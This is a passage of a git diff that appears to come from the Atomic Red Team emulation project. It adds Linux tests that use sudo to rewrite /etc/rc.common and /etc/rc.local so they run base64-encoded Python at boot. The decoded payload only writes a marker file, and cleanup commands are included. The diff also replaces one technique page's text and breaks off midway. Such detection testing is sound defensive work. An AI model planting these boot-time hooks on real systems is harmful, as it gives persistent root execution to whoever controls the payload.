"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 0e530577..fda6082f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -160,6 +160,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4
 privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
 privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -536,6 +538,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a
 persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index d4e71a68..89eb46ca 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -32,6 +32,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
 privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
@@ -157,6 +159,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD
 persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
 persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index a9ae5a7c..e7646cfb 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -324,6 +324,8 @@
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
   - Atomic Test #1: rc.common [macos]
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
   - Atomic Test #1: Re-Opened Applications [macos]
   - Atomic Test #2: Re-Opened Applications [macos]
@@ -967,6 +969,8 @@
 - T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
   - Atomic Test #1: rc.common [macos]
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
   - Atomic Test #1: Re-Opened Applications [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d1576879..6499f682 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -122,7 +122,9 @@
 - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
   - Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -451,7 +453,9 @@
 - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 241437be..420df707 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -23,7 +23,7 @@
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Keylogging](../../T1056.001/T1056.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -40,7 +40,7 @@
 |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | [RC Scripts](../../T1037.004/T1037.004.md) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 69c30c6a..9500a007 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -15389,6 +15389,48 @@ privilege-escalation:
 '
         elevation_required: true
         name: bash
+    - name: rc.common
+      auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+      description: 'Modify rc.common
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+          sudo chmod +x /etc/rc.common
+        cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+          && sudo rm $origfilename;fi
+
+'
+    - name: rc.local
+      auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+      description: 'Modify rc.local
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+          sudo chmod +x /etc/rc.local
+        cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+          sudo rm $origfilename;fi
+
+'
   T1547.007:
     technique:
       created: '2020-01-24T18:15:06.641Z'
@@ -43035,6 +43077,48 @@ persistence:
 '
         elevation_required: true
         name: bash
+    - name: rc.common
+      auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+      description: 'Modify rc.common
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+          sudo chmod +x /etc/rc.common
+        cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+          && sudo rm $origfilename;fi
+
+'
+    - name: rc.local
+      auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+      description: 'Modify rc.local
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+          sudo chmod +x /etc/rc.local
+        cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+          sudo rm $origfilename;fi
+
+'
   T1542.004:
     technique:
       created: '2020-10-20T00:05:48.790Z'
diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md
index 994659fb..5e258a38 100644
--- a/atomics/T1037.004/T1037.004.md
+++ b/atomics/T1037.004/T1037.004.md
@@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
 
 - [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
 
+- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
+
+- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
+
 
 <br/>
 
@@ -38,4 +42,68 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - rc.common
+Modify rc.common
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+sudo chmod +x /etc/rc.common
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - rc.local
+Modify rc.local
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+sudo chmod +x /etc/rc.local
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md
index 5e258a38..858ef875 100644
--- a/atomics/T1137.004/T1137.004.md
+++ b/atomics/T1137.004/T1137.004.md
@@ -1,105 +1,45 @@
-# T1037.004 - RC Scripts
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004)
-<blockquote>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
+# T1137.004 - Outlook Home Page
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004)
+<blockquote>Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
 
-Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
-
-Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
-
-Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</blockquote>
+Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
+</blockquote>
 
 ## Atomic Tests
 
-- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
-
-- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
-
-- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
+- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence)
 
 
 <br/>
 
-## Atomic Test #1 - rc.common
-Modify rc.common
+## Atomic Test #1 - Install Outlook Home Page Persistence
+This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed.
 
-[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
+Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox).
 
-**Supported Platforms:** macOS
+**Supported Platforms:** Windows
 
 
 
 
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder&#92;T1137.004&#92;src&#92;T1137.004.html|
+| outlook_version | Version of Outlook that is installed | string | 16.0|
+| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox|
 
 
-```bash
-sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
-```
+#### Attack Commands: Run with `command_prompt`! 
 
 
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - rc.common
-Modify rc.common
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
-printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
